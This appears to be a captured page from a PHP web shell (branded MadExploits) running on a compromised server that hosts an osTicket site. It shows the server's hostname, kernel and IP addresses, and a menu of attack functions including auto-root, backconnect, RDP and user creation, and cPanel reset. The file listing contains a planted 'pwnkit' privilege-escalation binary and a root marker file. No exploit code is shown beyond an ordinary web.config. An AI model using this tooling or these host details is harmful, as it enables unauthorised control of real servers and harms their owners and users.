Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
osticket /
upload.bkp /
[ HOME SHELL ]
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
apps
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
kb
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
scp
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
account.php
20.95
KB
-rw-r--r--
ajax.php
17.59
KB
-rw-r--r--
avatar.php
16.77
KB
-rw-r--r--
bootstrap.php
31.6
KB
-rw-r--r--
captcha.php
16.31
KB
-rw-r--r--
client.inc.php
18.71
KB
-rw-r--r--
file.php
18.01
KB
-rw-r--r--
index.php
17.99
KB
-rw-r--r--
login.php
21.34
KB
-rw-r--r--
logo.php
16.61
KB
-rw-r--r--
logout.php
16.42
KB
-rw-r--r--
main.inc.php
17.69
KB
-rw-r--r--
manage.php
17.95
KB
-rw-r--r--
offline.php
16.63
KB
-rw-r--r--
open.php
18.81
KB
-rw-r--r--
profile.php
16.91
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
pwreset.php
18.88
KB
-rw-r--r--
secure.inc.php
16.85
KB
-rw-r--r--
tickets.php
21.23
KB
-rw-r--r--
view.php
17.38
KB
-rw-r--r--
web.config
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.config
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <directoryBrowse enabled="false" /> <rewrite> <rules> <rule name="HTTP api" stopProcessing="true"> <match url="^(.*/)?api/(.*)$" ignoreCase="true"/> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="{R:1}api/http.php/{R:2}"/> </rule> <rule name="Site pages" stopProcessing="true"> <match url="^(.*/)?pages/(.*)$" ignoreCase="true"/> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="{R:1}pages/index.php/{R:2}"/> </rule> <rule name="Staff applications" stopProcessing="true"> <match url="^(.*/)?scp/apps/(.*)$" ignoreCase="true"/> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="{R:1}scp/apps/dispatcher.php/{R:2}"/> </rule> </rules> </rewrite> <defaultDocument> <files> <remove value="index.php" /> <add value="index.php" /> </files> </defaultDocument> </system.webServer> </configuration>
Close